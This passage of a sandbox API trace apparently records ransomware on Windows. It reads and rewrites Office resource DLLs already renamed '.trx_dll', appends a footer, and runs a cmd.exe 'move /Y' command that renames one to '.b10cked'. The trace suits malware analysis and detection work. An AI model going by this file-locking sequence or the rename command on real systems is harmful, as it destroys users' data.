lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.743] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.743] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22953307635) returned 1 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2e78 [0172.746] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3360 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3360 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.779] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0172.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.845] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0172.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0172.846] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0172.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0172.846] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0172.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SGRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0172.850] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3360 [0172.850] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.850] CloseHandle (hObject=0x114) returned 1 [0172.851] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX") returned 0x3c [0172.852] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.852] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x8a8, dwThreadId=0x954)) returned 1 [0172.854] CloseHandle (hObject=0x1b4) returned 1 [0172.854] CloseHandle (hObject=0x114) returned 1 [0172.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.854] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.854] ReleaseMutex (hMutex=0xf8) returned 1 [0172.854] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.854] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22964367218) returned 1 [0172.854] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4360 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.856] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3e78 [0172.856] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4360 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4360 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.901] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x21af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x21af, lpOverlapped=0x0) returned 1 [0172.926] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.926] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x21af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x21af, lpOverlapped=0x0) returned 1 [0172.926] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8623, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x21b1 [0172.926] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x21af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x21af, lpOverlapped=0x0) returned 1 [0172.926] SetFilePointer (in: hFile=0x114, lDistanceToMove=-8623, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x21b1 [0172.926] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x21af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x21af, lpOverlapped=0x0) returned 1 [0172.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0172.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="STINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="STINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0172.930] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4360 [0172.930] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, 